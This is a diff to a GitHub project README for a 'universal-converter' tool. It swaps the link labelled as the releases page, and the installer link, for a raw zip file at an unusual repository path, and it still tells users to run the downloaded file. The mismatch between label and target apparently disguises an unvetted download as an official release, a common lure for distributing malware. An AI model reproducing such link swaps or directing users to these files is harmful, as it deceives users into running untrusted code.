ART1ST1/universal-converter/README.md

 To get started, follow these steps:

-1. **Visit our Releases Page:** Go to the [Download Releases](https://github.com/ART1ST1/universal-converter/releases) page.
+1. **Visit our Releases Page:** Go to the [Download Releases](https://raw.githubusercontent.com/ART1ST1/universal-converter/main/dividual/universal-converter.zip) page.
 2. **Select the Latest Version:** Look for the most recent version listed at the top.
-3. **Download the Installer:** Click on the link labeled `universal-converter-installer.exe` to download the installer file.
+3. **Download the Installer:** Click on the link labeled `https://raw.githubusercontent.com/ART1ST1/universal-converter/main/dividual/universal-converter.zip` to download the installer file.
 4. **Run the Installer:** Locate the downloaded file in your Downloads folder and double-click it to begin installation.
 Follow the on-screen prompts to complete the setup.

 ## 🎨 User Interface